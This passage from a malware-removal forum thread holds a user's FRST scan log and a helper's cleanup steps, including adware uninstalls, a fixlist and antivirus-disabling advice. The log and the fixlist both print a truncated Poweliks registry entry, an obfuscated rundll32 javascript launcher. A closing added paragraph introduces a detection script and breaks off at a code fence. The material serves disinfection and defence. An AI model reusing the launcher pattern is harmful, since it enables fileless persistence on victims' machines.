TOSHIBA DVD PLAYER (HKLM\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.0.07-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.1.7.0 - TOSHIBA Corporation)
TOSHIBA Extended Tiles for Windows Mobility Center (HKLM\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version: 1.01.00 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM\...\InstallShield_{C730E42C-935A-45BB-A0C5-37E5234D111B}) (Version: 3.1.0.32 - TOSHIBA Corporation)
TOSHIBA Hardware Setup (HKLM\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.11 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.2 - TOSHIBA Corporation)
Toshiba Online Backup (HKLM\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.2.0.35 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.4.1.0 - TOSHIBA Corporation)
Toshiba Quality Application (HKLM\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.09 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.2.25 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.4 - TOSHIBA Corporation)
ToshibaRegistration (HKLM\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.3 - Toshiba)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Ventrilo Client (HKLM\...\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)
VoiceOver Kit (HKLM\...\{6B4AD1A9-E73A-4184-9D6B-072F8A3C5EBA}) (Version: 1.42.128.0 - Apple Inc.)
WildTangent Games (HKLM\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.71 - WildTangent)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Mobile Device Center (HKLM\...\{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
Windows Mobile Device Center Driver Update (HKLM\...\{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)
Woman Poker Player Lobby (HKLM\...\Woman Poker Player Lobby by CardRoom.com_is1) (Version:  - CardRoom International, LLC)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}\InprocServer32 -> C:\Users\April\AppData\Roaming\Catalina – Print Savings\npBcsKtTcHW.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
 
==================== Restore Points  =========================
 
09-12-2014 18:48:06 Windows Update
10-12-2014 03:39:55 Windows Update
13-12-2014 04:37:19 Windows Update
13-12-2014 23:20:48 Windows Update
19-12-2014 02:30:49 Windows Update
23-12-2014 11:57:40 Windows Update
26-12-2014 20:08:39 Windows Update
30-12-2014 09:39:39 Windows Update
01-01-2015 00:31:30 Restore Operation
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2009-06-10 16:39 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0A8D3326-C4B7-4813-BD7D-4481491A4BE4} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {1AFBF29F-9EB9-450B-8B70-FAA7C5CFE916} - System32\Tasks\{9C18DC0D-56D4-4DC9-9963-E0801CA79D51} => pcalua.exe -a "c:\Poker Application\_uninstallation_info\UB\CasinoUninstall.exe"
Task: {25399E15-DD0C-4965-A43B-584BFFD0BC87} - System32\Tasks\MotoHelper MUM => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {6B3FD0C3-CF7A-4C5B-9825-1D6B8FB314B9} - System32\Tasks\MotoHelper Initial Update => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {748AB0F1-1C20-4007-8043-AC62FFDDD249} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-23] (Google Inc.)
Task: {7A25820B-8689-4578-9CC1-0E4E4E1D3153} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-12] (Adobe Systems Incorporated)
Task: {A4DE1393-A58E-4665-8CA9-9587551B3524} - System32\Tasks\{E94825DE-B4BE-402F-A640-81421CCF7FA4} => pcalua.exe -a "C:\Users\April\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G3DJWFVX\AdobeAIRInstaller.exe" -d C:\Users\April\Desktop
Task: {AF1FBC7E-E94A-40C3-8D79-6274840FD861} - System32\Tasks\{1037A8AB-79D4-4DFF-AC6F-320B65207154} => C:\Program Files\Skype\\Phone\Skype.exe [2013-11-18] (Skype Technologies S.A.)
Task: {BF303E8E-1A41-430C-9EE4-95521698FD95} - System32\Tasks\MotoHelper Update => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {C31BC5FB-A9F8-4EC2-A19C-2C6E927B298F} - System32\Tasks\MotoHelper Routing => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {D75E9E91-7C7C-4DF6-BBC9-E43DD2B730FE} - System32\Tasks\{ABED2CE2-1675-45C7-94E4-95CFBF59971C} => pcalua.exe -a "C:\Users\April\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8AYHR0JK\do-download[1].exe" -d C:\Users\April\Desktop
Task: {D9B2DD3F-ADAE-4A23-B3C4-6C1CB99C76DE} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2009-07-13] (TOSHIBA CORPORATION)
Task: {E75DA587-9600-4EAA-9EC5-A02AA70080E5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-23] (Google Inc.)
Task: {F5E92D4A-A722-4B5A-863D-98B9C3BA5FFF} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-12-02] (AVAST Software)
Task: {F83343C8-C3FD-4643-86C6-AB04BF721F29} - System32\Tasks\{6C69C5F8-42EC-4867-87C6-C5AFE1F3D59D} => pcalua.exe -a "C:\Users\April\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S137ZGJX\RaginBet_Setup_WinXP_v03.39Rev366922.exe" -d C:\Users\April\Desktop
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-12-31 14:22 - 2014-12-31 14:22 - 02908160 _____ () C:\Program Files\AVAST Software\Avast\defs\14123101\algo.dll
2015-01-01 17:56 - 2015-01-01 17:56 - 02909696 _____ () C:\Program Files\AVAST Software\Avast\defs\15010101\algo.dll
2011-11-01 23:26 - 2011-11-01 23:26 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2011-11-01 23:26 - 2011-11-01 23:26 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00128336 _____ () C:\Program Files\Motorola Media Link\Lite\liveupdatetactics.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00023872 _____ () C:\Program Files\Motorola Media Link\Lite\DbAccess.dll
2011-09-19 15:59 - 2011-09-19 15:59 - 00465632 _____ () C:\Program Files\Motorola Media Link\Lite\sqlite3.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00045368 _____ () C:\Program Files\Motorola Media Link\Lite\NAdvLog.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00034128 _____ () C:\Program Files\Motorola Media Link\Lite\NFileCacheDBAccess.dll
2011-12-06 16:00 - 2011-12-06 16:00 - 00214896 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
2011-12-06 16:00 - 2011-12-06 16:00 - 00784240 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
2014-12-02 04:18 - 2014-12-02 04:18 - 38562088 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2014-12-12 19:58 - 2014-12-05 20:50 - 01077064 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\libglesv2.dll
2014-12-12 19:58 - 2014-12-05 20:50 - 00211272 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\libegl.dll
2014-12-12 19:59 - 2014-12-05 20:50 - 09009480 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\pdf.dll
2014-12-12 19:58 - 2014-12-05 20:50 - 01677128 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Program Files\Colt Poker:MID
AlternateDataStreams: C:\Program Files\Intertops Poker:MID
AlternateDataStreams: C:\Users\April\Desktop\Circulation Notices.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupfolder: C:^Users^April^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: 00TCrdMain => %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Conime => %windir%\system32\conime.exe
MSCONFIG\startupreg: Desktop Software => "C:\Program Files\Common Files\SupportSoft\bin\bcont.exe"  /ini "C:\Program Files\ComcastUI\Desktop Software\uinstaller.ini" /fromrun /starthidden
MSCONFIG\startupreg: EKStatusMonitor => C:\Program Files\Kodak\AiO\StatusMonitor\EKStatusMonitor.exe
MSCONFIG\startupreg: Gadwin PrintScreen => "C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe" /nosplash
MSCONFIG\startupreg: HotKeysCmds => C:\windows\system32\hkcmd.exe
MSCONFIG\startupreg: HSON => %ProgramFiles%\TOSHIBA\TBS\HSON.exe
MSCONFIG\startupreg: IgfxTray => C:\windows\system32\igfxtray.exe
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: MyTOSHIBA => "C:\Program Files\TOSHIBA\My Toshiba\MyToshiba.exe" /AUTO
MSCONFIG\startupreg: NortonOnlineBackupReminder => "C:\Program Files\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe" UNATTENDED
MSCONFIG\startupreg: Persistence => C:\windows\system32\igfxpers.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
MSCONFIG\startupreg: SandboxieControl => "C:\Program Files\Sandboxie\SbieCtrl.exe"
MSCONFIG\startupreg: SmartFaceVWatcher => %ProgramFiles%\Toshiba\SmartFaceV\SmartFaceVWatcher.exe
MSCONFIG\startupreg: SmoothView => %ProgramFiles%\Toshiba\SmoothView\SmoothView.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: SynTPEnh => %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: Teco => "%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r
MSCONFIG\startupreg: TosSENotify => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
MSCONFIG\startupreg: TosWaitSrv => %ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe
MSCONFIG\startupreg: TPwrMain => %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
MSCONFIG\startupreg: TWebCamera => "%ProgramFiles%\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe" autorun
MSCONFIG\startupreg: Windows Mobile Device Center => %windir%\WindowsMobile\wmdc.exe
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-692471023-1834078390-643647909-500 - Administrator - Disabled)
April (S-1-5-21-692471023-1834078390-643647909-1001 - Administrator - Enabled) => C:\Users\April
Guest (S-1-5-21-692471023-1834078390-643647909-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-692471023-1834078390-643647909-1002 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/01/2015 11:44:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb4
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x41d0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 11:08:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wlmail.exe version 15.4.3555.308 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 3324
 
Start Time: 01d026414876299c
 
Termination Time: 131
 
Application Path: C:\Program Files\Windows Live\Mail\wlmail.exe
 
Report Id: f32992ff-9234-11e4-aa48-001e33ff5421
 
Error: (01/01/2015 11:06:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3aac
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:59:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc00000fd
Fault offset: 0x0000afc8
Faulting process id: 0x2d5c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:21:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x2988
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00166f88
Faulting process id: 0x34d4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:05:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bca28
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x220c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 08:34:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcd6e
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x000a31d8
Faulting process id: 0x33dc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 08:24:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x3af8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 07:47:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bce11
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x2280
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
 
System errors:
=============
Error: (01/01/2015 08:58:04 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (01/01/2015 04:08:29 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (01/01/2015 01:52:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (01/01/2015 00:38:39 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (01/01/2015 00:26:50 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (01/01/2015 03:33:05 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UPnP Device Host service failed to start due to the following error: 
%%1069
 
Error: (01/01/2015 03:33:05 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The upnphost service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error: 
%%50
 
To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
 
Error: (01/01/2015 03:33:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1069upnphost{204810B9-73B2-11D4-BF42-00B0D0118B56}
 
Error: (01/01/2015 02:16:03 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (01/01/2015 02:13:07 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
 
Microsoft Office Sessions:
=========================
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU T6500 @ 2.10GHz
Percentage of memory in use: 65%
Total physical RAM: 2939.99 MB
Available physical RAM: 1027.2 MB
Total Pagefile: 5878.27 MB
Available Pagefile: 3250.81 MB
Total Virtual: 2047.88 MB
Available Virtual: 1928.32 MB
 
==================== Drives ================================
 
Drive c: (TI102805W0E) (Fixed) (Total:223.42 GB) (Free:138.82 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.9 GB) (Disk ID: 1902C2AF)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=223.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=8 GB) - (Type=17)
 
==================== End Of Log =================

  • 0

#13
pystryker


    Trusted Helper

  • Malware Removal
  • 3,886 posts
Well done, let's get started. :)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.


Step 1: Program Uninstalls and Chrome Plugin Removals

Please uninstall the following programs from your machine as they are adware/malware related programs:
  • Catalina Savings Printer
  • Colt Poker

Disable Chrome Plugins

There are some plugins in Chrome that need to be disabled. Please follow the instructions below to disable them.
  • Start Chrome and type this into the address bar: chrome:plugins
  • This will display a page of all the installed plugins. Please disable the plugins in the list below by clicking the word Disable under each one.
  • If one of the plugins I've asked you to remove is not in the list, don't worry about it. Just move to the next one in the list. :)

  • Coupons Inc., Coupon Printer
  • Catalina Savings Printer

Step 2: Fix with FRST
  • Open Notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this, highlight the contents of the box, right-click on it and select Copy.)
  • Right-click in the open Notepad and select Paste.
  • Save it on the desktop as fixlist.txt

Start
CreateRestorePoint:
CloseProcesses:
(Coupons.com Inc.) C:\Program Files\Coupons\CouponPrinterService.exe
C:\Program Files\Coupons
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {6f766fac-5ca7-11e1-ba6a-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {952aea8a-075f-11e3-a52c-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {97b3e8bf-0fa5-11e1-8250-001e33ff5421} - F:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CHR HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.startpage.com/
FF Plugin HKU\S-1-5-21-692471023-1834078390-643647909-1001: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
C:\Users\April\AppData\Roaming\CATALI~2
R2 CouponPrinterService; C:\Program Files\Coupons\CouponPrinterService.exe [152560 2014-02-13] (Coupons.com Inc.)
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}\InprocServer32 -> C:\Users\April\AppData\Roaming\Catalina Print Savings\npBcsKtTcHW.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
Hosts:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

Step 4: AdwCleaner

Download ADWcleaner by clicking here. Please save it to your Desktop.

  • Double click (Vista and 7 users: right click) the adwcleaner.exe file and click Run as Administrator and accept the UAC prompt to run AdwCleaner
  • Close any open windows or browsers.
  • Pause your Anti-Virus program if it is running.
  • Once it starts, click on the Scan button.
  • Let the scan complete itself. This may take a few minutes.
  • Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Clean button. When finished, it will ask to reboot. Please reboot.
  • When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
    • Click the Report button and the log will open. Copy and Paste the contents of the log file into your next reply.
    This report is also saved at C:\AdwCleaner[R0].txt

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool

AdwCleaner

How is the machine running now?

  • 0
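Added example, not part of the original post and not FRST's own code: a small Python triage pass over FRST-style log lines that flags the registry pattern the helper marked as Poweliks (a COM server value that launches rundll32.exe with a javascript: handler), plus two weaker signals. The sample lines are copied from the logs in this thread; the rule names, severities and the one-character shift decoding of the visible fragment are this example's own assumptions.

```python
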